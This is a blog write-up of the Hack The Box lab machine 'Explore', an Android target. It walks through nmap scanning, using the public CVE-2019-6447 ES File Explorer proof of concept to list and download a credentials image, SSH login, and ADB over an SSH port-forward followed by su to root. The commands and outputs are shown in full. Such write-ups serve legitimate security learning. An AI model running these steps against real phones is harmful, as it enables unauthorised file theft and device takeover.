Writeup for the easy ranked HTB box Explore

Posted on Oct 30, 2021


CVE-2019-6447 | “The ES File Explorer File Manager application through for Android allows remote attackers to read arbitrary files or execute applications via TCP port 59777 requests on the local Wi-Fi network. This TCP port remains open after the ES application has been launched once, and responds to unauthenticated application/json data over HTTP.”

If you never tried hacking Android-devices before this could be a good first box. The credentials found for the User-flag was very CTF-like but I think the box was OK anyway. Tools used for this box was nmap, searchsploit, and adb. The environment I used was a kali-VM (in Parallels Desktop 17) on my MacOS-machine.

Let’s GO!


Port scanning with NMAP

Starting of with a standard nmap-scan to find open ports (make sure to always save the output so you can go back later)

└─$ sudo nmap -T4 -Pn -p- -A explore.htb -o nmap.init
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-23 19:12 CEST
Nmap scan report for explore.htb (
Host is up (0.046s latency).
Not shown: 65530 closed ports
2222/tcp  open     ssh     (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp  filtered freeciv
35367/tcp open     unknown
| fingerprint-strings:
|   GenericLines:
|     HTTP/1.0 400 Bad Request
|     Date: Thu, 23 Sep 2021 17:12:59 GMT
|     Content-Length: 22
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|   GetRequest:
|     HTTP/1.1 412 Precondition Failed
|     Date: Thu, 23 Sep 2021 17:12:59 GMT
|     Content-Length: 0
|   HTTPOptions:
|     HTTP/1.0 501 Not Implemented
|     Date: Thu, 23 Sep 2021 17:13:04 GMT
|     Content-Length: 29
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Method not supported: OPTIONS
|   Help:
|     HTTP/1.0 400 Bad Request
|     Date: Thu, 23 Sep 2021 17:13:19 GMT
|     Content-Length: 26
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: HELP
|   RTSPRequest:
|     HTTP/1.0 400 Bad Request
|     Date: Thu, 23 Sep 2021 17:13:04 GMT
|     Content-Length: 39
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     valid protocol version: RTSP/1.0
|   SSLSessionReq:
|     HTTP/1.0 400 Bad Request
|     Date: Thu, 23 Sep 2021 17:13:19 GMT
|     Content-Length: 73
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|     ?G???,???`~?
|     ??{????w????<=?o?
|   TLSSessionReq:
|     HTTP/1.0 400 Bad Request
|     Date: Thu, 23 Sep 2021 17:13:19 GMT
|     Content-Length: 71
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|     ??random1random2random3random4
|   TerminalServerCookie:
|     HTTP/1.0 400 Bad Request
|     Date: Thu, 23 Sep 2021 17:13:19 GMT
|     Content-Length: 54
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|_    Cookie: mstshash=nmap
42135/tcp open     http    ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open     http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: Device: phone

TRACEROUTE (using port 993/tcp)
1   50.53 ms
2   50.69 ms explore.htb (

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 134.42 seconds


The open ports for this machine is:

  • 2222 - ssh
  • 5555 - freeciv (Civilization game? later found out it is an “Android Debug Bridge”-port)
  • 35367 - ???
  • 42135 - ES File Explorer
  • 59777 - Minecraft server? (Later found out that this was an ES File Explorer port Android uses)

First I thought (as nmap said) that it was a server for Minecraft and freeciv so started of looking for CVE’s for that… but later on I discovered that it was ports for Android-communication (the box is also labeled ‘Android’ so I should have noticed that earlier..). Taking a closer look at the ‘ES File Explorer’ to see if there is any exploits available

└─$ searchsploit "ES File Explorer"
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                              |  Path
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
ES File Explorer - Arbitrary File Read                                                                            | android/remote/50070.py
iOS iFileExplorer Free - Directory Traversal                                                                                | ios/remote/16278.py
MetaProducts Offline Explorer 1.x - FileSystem Disclosure                                                                   | windows/remote/20488.txt
Microsoft Internet Explorer / MSN - ICC Profiles Crash (PoC)                                                                | windows/dos/1110.txt
Microsoft Internet Explorer 4.x/5 / Outlook 2000 0/98 0/Express 4.x - ActiveX '.CAB' File Execution                         | windows/remote/19603.txt
Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing / Cross Frame Access                             | windows/remote/19094.txt
Microsoft Internet Explorer 5 - ActiveX Object For Constructing Type Libraries For Scriptlets File Write                    | windows/remote/19468.txt
Microsoft Internet Explorer 5 / Firefox 0.8 / OmniWeb 4.x - URI Protocol Handler Arbitrary File Creation/Modification       | windows/remote/24116.txt
Microsoft Internet Explorer 5/6 - 'file://' Request Zone Bypass                                                             | windows/remote/22575.txt
Microsoft Internet Explorer 6 - '%USERPROFILE%' File Execution                                                              | windows/remote/22734.html
Microsoft Internet Explorer 6 - Local File Access                                                                           | windows/remote/29619.html
Microsoft Internet Explorer 7 - Arbitrary File Rewrite (MS07-027)                                                           | windows/remote/3892.html
My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities                                                                   | ios/webapps/28975.txt
WebFileExplorer 3.6 - 'user' / 'pass' SQL Injection                                                                         | php/webapps/35851.txt
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

From here there was only one exploit that looked interesting, and it was the “ES File Explorer - Arbitrary File Read (CVE-2019-6447)”. Arbitrary File Read is a common vulnerability that makes an attacker read files on a system.


This POC is straight forward, I tried some commands but the interesting one here was ’listPics’ where there was a photo called ‘creds.jpg’

#python3 50070.py <command> <IP> [file to download]

# Available Commands #

#listFiles: List all the files
#listPics: List all the pictures
#listVideos: List all the videos
#listAudios: List all the audio files
#listApps: List all the apps installed
#listAppsSystem: List all the system apps
#listAppsPhone: List all the phone apps
#listAppsSdcard: List all the apk files in the sdcard
#listAppsAll: List all the apps installed (system apps included)
#getDeviceInfo: Get device info
#appPull: Pull an app from the device. Package name parameter is needed
#appLaunch: Launch an app. Package name parameter is needed
#getAppThumbnail: Get the icon of an app. Package name parameter is needed

└─$ python3 50070.py listPics explore.htb

|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |

name : concept.jpg
time : 4/21/21 02:38:08 AM
location : /storage/emulated/0/DCIM/concept.jpg
size : 135.33 KB (138,573 Bytes)

name : anc.png
time : 4/21/21 02:37:50 AM
location : /storage/emulated/0/DCIM/anc.png
size : 6.24 KB (6,392 Bytes)

name : creds.jpg
time : 4/21/21 02:38:18 AM
location : /storage/emulated/0/DCIM/creds.jpg
size : 1.14 MB (1,200,401 Bytes)

name : 224_anc.png
time : 4/21/21 02:37:21 AM
location : /storage/emulated/0/DCIM/224_anc.png
size : 124.88 KB (127,876 Bytes)

└─$ sudo python3 50070.py getFile explore.htb /storage/emulated/0/DCIM/creds.jpg                                                          1
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |

[+] Downloading file...
[+] Done. Saved as `out.dat`.

Open the downloaded file ‘creds.jpg’ and we found credentials for the user kristi (yeah very CTF-like) creds

So now we have access via ssh and on htb-easy that usually means we have the USER-flag as well

└─$ ssh [email protected] -p 2222                                                                                                      255The authenticity of host '[explore.htb]:2222 ([]:2222)' can't be established.
RSA key fingerprint is SHA256:3mNL574rJyHCOGm1e7Upx4NHXMg/YnJJzq+jXhdQQxI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Failed to add the host to the list of known hosts (/home/erra/.ssh/known_hosts).
Password authentication
:/ $ whoami
:/ $
:/ $ ls
acct                   init.superuser.rc       sbin
bin                    init.usb.configfs.rc    sdcard
bugreports             init.usb.rc             sepolicy
cache                  init.zygote32.rc        storage
charger                init.zygote64_32.rc     sys
config                 lib                     system
d                      mnt                     ueventd.android_x86_64.rc
data                   odm                     ueventd.rc
default.prop           oem                     vendor
dev                    plat_file_contexts      vendor_file_contexts
etc                    plat_hwservice_contexts vendor_hwservice_contexts
fstab.android_x86_64   plat_property_contexts  vendor_property_contexts
init                   plat_seapp_contexts     vendor_seapp_contexts
init.android_x86_64.rc plat_service_contexts   vendor_service_contexts
init.environ.rc        proc                    vndservice_contexts
init.rc                product
:/ $ ls sdcard/
Alarms  DCIM     Movies Notifications Podcasts  backups   user.txt
Android Download Music  Pictures      Ringtones dianxinos
:/ $ cat sdcard/user.txt
:/ $

I started of by enumerating folders and trying various commands but found nothing so from here I was pretty lost. I started to google around, and since we have a user-account I search for like “android shell privilege escalation” and after a while found this Android pentesting guide. First, we need to install adb (Android Debug Bridge), which is a command-line tool for communicating with Android-devices. The documentation says: “The adb command facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that you can use to run a variety of commands on a device”. Sounds exactly what I need!

After installing adb I tried to just connect to the device, but it didn’t seem to work

└─$ adb connect
# No output

Scrolling down in the pentest guide and I found out how to port-forward via ssh (just add the -L switch with correct parameters) and then connect via adb

Privilege escalation

# Connect ssh on port 2222 with a port-forward of 5555 via my VM
└─$ ssh [email protected] -p 2222 -L 5555:
# Connect adb to port 5555
└─$ adb connect
connected to
# Connect to the shell
└─$ adb shell
x86_64:/ $ whoami
x86_64:/ $
x86_64:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0
x86_64:/ $ cd data
x86_64:/data $ ls
ls: .: Permission denied
1|x86_64:/data $ su
:/ # whoami
:/ # cat data/root.txt

And boom, simple as that we have shell-access and after some trial and error I just typed su and escalated to root!


This box was my first Android-box so from time to time I was pretty lost. But I learned about the adb-tool which was new for me and hopefully I can have use for that somehow later in my career.

Happy hacking!

/Eric (cyberrauken)